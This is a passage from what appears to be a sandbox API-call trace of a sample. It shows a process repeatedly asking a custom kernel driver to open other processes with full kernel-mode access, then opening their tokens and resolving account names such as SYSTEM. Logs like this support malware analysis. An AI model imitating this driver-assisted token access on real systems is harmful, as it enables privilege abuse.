TokenHandle=0xfffffa8002123cc0*=0xc0) returned 0x0 [0183.102] ZwClose (Handle=0xffffffff80000768) returned 0x0 [0183.103] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0183.103] GetTokenInformation (in: TokenHandle=0xc0, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0183.103] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0183.105] CloseHandle (hObject=0xc0) returned 1 [0183.105] CloseHandle (hObject=0xc4) returned 1 [0183.105] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x454) returned 0xc4 [0183.105] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0183.105] ObReferenceObjectByHandle (in: Handle=0xc4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88002aab668, HandleInformation=0x0 | out: Object=0xfffff88002aab668*=0xfffffa80036d0060, HandleInformation=0x0) returned 0x0 [0183.105] ObOpenObjectByPointer (in: Object=0xfffffa80036d0060, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88002aab670 | out: Handle=0xfffff88002aab670*=0xffffffff80000768) returned 0x0 [0183.105] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0183.105] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000768, DesiredAccess=0x8, TokenHandle=0xfffffa8002123cc0 | out: TokenHandle=0xfffffa8002123cc0*=0xc0) returned 0x0 [0183.105] ZwClose (Handle=0xffffffff80000768) returned 0x0 [0183.106] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0183.106] GetTokenInformation (in: TokenHandle=0xc0, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0183.106] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0183.107] CloseHandle (hObject=0xc0) returned 1 [0183.107] CloseHandle (hObject=0xc4) returned 1 [0183.107] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x47c) returned 0xc4 [0183.108] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0183.108] ObReferenceObjectByHandle (in: Handle=0xc4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88002aab668, HandleInformation=0x0 | out: Object=0xfffff88002aab668*=0xfffffa8003755060, HandleInformation=0x0) returned 0x0 [0183.108] ObOpenObjectByPointer (in: Object=0xfffffa8003755060, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88002aab670 | out: Handle=0xfffff88002aab670*=0xffffffff80000768) returned 0x0 [0183.108] ObfDereferenceObject (Object=0xfffffa8003755060) returned 0x43 [0183.108] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000768, DesiredAccess=0x8, TokenHandle=0xfffffa8002123cc0 | out: TokenHandle=0xfffffa8002123cc0*=0xc0) returned 0x0 [0183.108] ZwClose (Handle=0xffffffff80000768) returned 0x0 [0183.108] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0183.108] GetTokenInformation (in: TokenHandle=0xc0, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0183.108] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="SYSTEM", cchName=0x12d3c0, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0183.110] CloseHandle (hObject=0xc0) returned 1 [0183.110] CloseHandle (hObject=0xc4) returned 1 [0183.110] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4bc) returned 0xc4 [0183.110] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0183.110] ObReferenceObjectByHandle (in: Handle=0xc4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88002aab668, HandleInformation=0x0 | out: Object=0xfffff88002aab668*=0xfffffa80037e1060, HandleInformation=0x0) returned 0x0 [0183.110] ObOpenObjectByPointer (in: Object=0xfffffa80037e1060, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88002aab670 | out: Handle=0xfffff88002aab670*=0xffffffff80000768) returned 0x0 [0183.110] ObfDereferenceObject (Object=0xfffffa80037e1060) returned 0xba [0183.110] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000768, DesiredAccess=0x8, TokenHandle=0xfffffa8002123cc0 | out: TokenHandle=0xfffffa8002123cc0*=0xc0) returned 0x0 [0183.110] ZwClose (Handle=0xffffffff80000768) returned 0x0 [0183.111] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0183.111] GetTokenInformation (in: TokenHandle=0xc0, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0183.111] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x13), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="LOCAL SERVICE", cchName=0x12d3c0, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0184.110] CloseHandle (hObject=0xc0) returned 1 [0184.110] CloseHandle (hObject=0xc4) returned 1 [0184.110] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4c8) returned 0xc4 [0184.110] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0184.111] ObReferenceObjectByHandle (in: Handle=0xc4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88002aab668, HandleInformation=0x0 | out: Object=0xfffff88002aab668*=0xfffffa80037fe060, HandleInformation=0x0) returned 0x0 [0184.111] ObOpenObjectByPointer (in: Object=0xfffffa80037fe060, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88002aab670 | out: Handle=0xfffff88002aab670*=0xffffffff80000844) returned 0x0 [0184.111] ObfDereferenceObject (Object=0xfffffa80037fe060) returned 0x88 [0184.111] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000844, DesiredAccess=0x8, TokenHandle=0xfffffa8003a9cfc0 | out: TokenHandle=0xfffffa8003a9cfc0*=0xc0) returned 0x0 [0184.111] ZwClose (Handle=0xffffffff80000844) returned 0x0 [0184.111] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0184.111] GetTokenInformation (in: TokenHandle=0xc0, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0184.111] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0184.113] CloseHandle (hObject=0xc0) returned 1 [0184.114] CloseHandle (hObject=0xc4) returned 1 [0184.114] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x588) returned 0xc4 [0184.114] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0184.114] ObReferenceObjectByHandle (in: Handle=0xc4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88002aab668, HandleInformation=0x0 | out: Object=0xfffff88002aab668*=0xfffffa80036a4060, HandleInformation=0x0) returned 0x0 [0184.114] ObOpenObjectByPointer (in: Object=0xfffffa80036a4060, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88002aab670 | out: Handle=0xfffff88002aab670*=0xffffffff80000844) returned 0x0 [0184.114] ObfDereferenceObject (Object=0xfffffa80036a4060) returned 0x35 [0184.114] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000844, DesiredAccess=0x8, TokenHandle=0xfffffa8003a9cfc0 | out: TokenHandle=0xfffffa8003a9cfc0*=0xc0) returned 0x0 [0184.114] ZwClose (Handle=0xffffffff80000844) returned 0x0 [0184.114] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0184.114] GetTokenInformation (in: TokenHandle=0xc0, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0184.115] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0184.117] CloseHandle (hObject=0xc0) returned 1 [0184.117] CloseHandle (hObject=0xc4) returned 1 [0184.118] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6fc) returned 0xc4 [0184.118] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0184.118] ObReferenceObjectByHandle (in: Handle=0xc4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88002aab668, HandleInformation=0x0 | out: Object=0xfffff88002aab668*=0xfffffa8001e8a630, HandleInformation=0x0) returned 0x0 [0184.118] ObOpenObjectByPointer (in: Object=0xfffffa8001e8a630, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88002aab670 | out: Handle=0xfffff88002aab670*=0xffffffff80000844) returned 0x0 [0184.118] ObfDereferenceObject (Object=0xfffffa8001e8a630) returned 0x14 [0184.118] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000844, DesiredAccess=0x8, TokenHandle=0xfffffa8003a9cfc0 | out: TokenHandle=0xfffffa8003a9cfc0*=0xc0) returned 0x0 [0184.118] ZwClose (Handle=0xffffffff80000844) returned 0x0 [0184.118] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0184.118] GetTokenInformation (in: TokenHandle=0xc0, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0184.119] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0184.121] CloseHandle (hObject=0xc0) returned 1 [0184.121] CloseHandle (hObject=0xc4) returned 1 [0184.122] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xc4 [0184.122] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0184.122] ObReferenceObjectByHandle (in: Handle=0xc4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88002aab668, HandleInformation=0x0 | out: Object=0xfffff88002aab668*=0xfffffa8001fccb30, HandleInformation=0x0) returned 0x0 [0184.122] ObOpenObjectByPointer (in: Object=0xfffffa8001fccb30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88002aab670 | out: Handle=0xfffff88002aab670*=0xffffffff80000844) returned 0x0 [0184.122] ObfDereferenceObject (Object=0xfffffa8001fccb30) returned 0x14 [0184.122] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000844, DesiredAccess=0x8, TokenHandle=0xfffffa8003a9cfc0 | out: TokenHandle=0xfffffa8003a9cfc0*=0xc0) returned 0x0 [0184.122] ZwClose (Handle=0xffffffff80000844) returned 0x0 [0184.122] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0184.122] GetTokenInformation (in: TokenHandle=0xc0, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0184.122] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0184.125] CloseHandle (hObject=0xc0) returned 1 [0184.125] CloseHandle (hObject=0xc4) returned 1 [0184.125] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x70c) returned 0xc4 [0184.125] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0184.125] ObReferenceObjectByHandle (in: Handle=0xc4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88002aab668, HandleInformation=0x0 | out: Object=0xfffff88002aab668*=0xfffffa8001feeb30, HandleInformation=0x0) returned 0x0 [0184.125] ObOpenObjectByPointer (in: Object=0xfffffa8001feeb30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88002aab670 | out: Handle=0xfffff88002aab670*=0xffffffff80000844) returned 0x0 [0184.125] ObfDereferenceObject (Object=0xfffffa8001feeb30) returned 0x14 [0184.125] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000844, DesiredAccess=0x8, TokenHandle=0xfffffa8003a9cfc0 | out: TokenHandle=0xfffffa8003a9cfc0*=0xc0) returned 0x0 [0184.125] ZwClose (Handle=0xffffffff80000844) returned 0x0 [0184.125] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0184.126] GetTokenInformation (in: TokenHandle=0xc0, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0184.126] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0184.128] CloseHandle (hObject=0xc0) returned 1 [0184.128] CloseHandle (hObject=0xc4) returned 1 [0184.128] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x434) returned 0xc4 [0184.128] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0184.128] ObReferenceObjectByHandle (in: Handle=0xc4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88002aab668, HandleInformation=0x0 | out: Object=0xfffff88002aab668*=0xfffffa8002005b30, HandleInformation=0x0) returned 0x0 [0184.129] ObOpenObjectByPointer (in: Object=0xfffffa8002005b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88002aab670 | out: Handle=0xfffff88002aab670*=0xffffffff80000844) returned 0x0 [0184.129] ObfDereferenceObject (Object=0xfffffa8002005b30) returned 0x14 [0184.129] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000844, DesiredAccess=0x8, TokenHandle=0xfffffa8003a9cfc0 | out: TokenHandle=0xfffffa8003a9cfc0*=0xc0) returned 0x0 [0184.129] ZwClose (Handle=0xffffffff80000844) returned 0x0 [0184.129] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0184.129] GetTokenInformation (in: TokenHandle=0xc0, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0184.129] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0184.132] CloseHandle (hObject=0xc0) returned 1 [0184.132] CloseHandle (hObject=0xc4) returned 1 [0184.132] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a8) returned 0xc4 [0184.132] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0184.132] ObReferenceObjectByHandle (in: Handle=0xc4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88002aab668, HandleInformation=0x0 | out: Object=0xfffff88002aab668*=0xfffffa8002017b30, HandleInformation=0x0) returned 0x0 [0184.132] ObOpenObjectByPointer (in: Object=0xfffffa8002017b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88002aab670 | out: Handle=0xfffff88002aab670*=0xffffffff80000844) returned 0x0 [0184.132] ObfDereferenceObject (Object=0xfffffa8002017b30) returned 0x14 [0184.132] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000844, DesiredAccess=0x8, TokenHandle=0xfffffa8003a9cfc0 | out: TokenHandle=0xfffffa8003a9cfc0*=0xc0) returned 0x0 [0184.132] ZwClose (Handle=0xffffffff80000844) returned 0x0 [0184.133] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0184.133] GetTokenInformation (in: TokenHandle=0xc0, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0184.133] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0184.135] CloseHandle (hObject=0xc0) returned 1 [0184.135] CloseHandle (hObject=0xc4) returned 1 [0184.136] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x564) returned 0xc4 [0184.136] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0184.136] ObReferenceObjectByHandle (in: Handle=0xc4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88002aab668, HandleInformation=0x0 | out: Object=0xfffff88002aab668*=0xfffffa8002026b30, HandleInformation=0x0) returned 0x0 [0184.136] ObOpenObjectByPointer (in: Object=0xfffffa8002026b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88002aab670 | out: Handle=0xfffff88002aab670*=0xffffffff80000844) returned 0x0 [0184.136] ObfDereferenceObject (Object=0xfffffa8002026b30) returned 0x14 [0184.136] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000844, DesiredAccess=0x8, TokenHandle=0xfffffa8003a9cfc0 | out: TokenHandle=0xfffffa8003a9cfc0*=0xc0) returned 0x0 [0184.136] ZwClose (Handle=0xffffffff80000844) returned 0x0 [0184.136] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0184.136] GetTokenInformation (in: TokenHandle=0xc0, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0184.136] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0184.139] CloseHandle (hObject=0xc0) returned 1 [0184.139] CloseHandle (hObject=0xc4) returned 1 [0184.139] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x560) returned 0xc4 [0184.139] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0184.139] ObReferenceObjectByHandle (in: Handle=0xc4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88002aab668, HandleInformation=0x0 | out: Object=0xfffff88002aab668*=0xfffffa800202ea70, HandleInformation=0x0) returned 0x0 [0184.139] ObOpenObjectByPointer (in: Object=0xfffffa800202ea70, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88002aab670 | out: Handle=0xfffff88002aab670*=0xffffffff80000844) returned 0x0 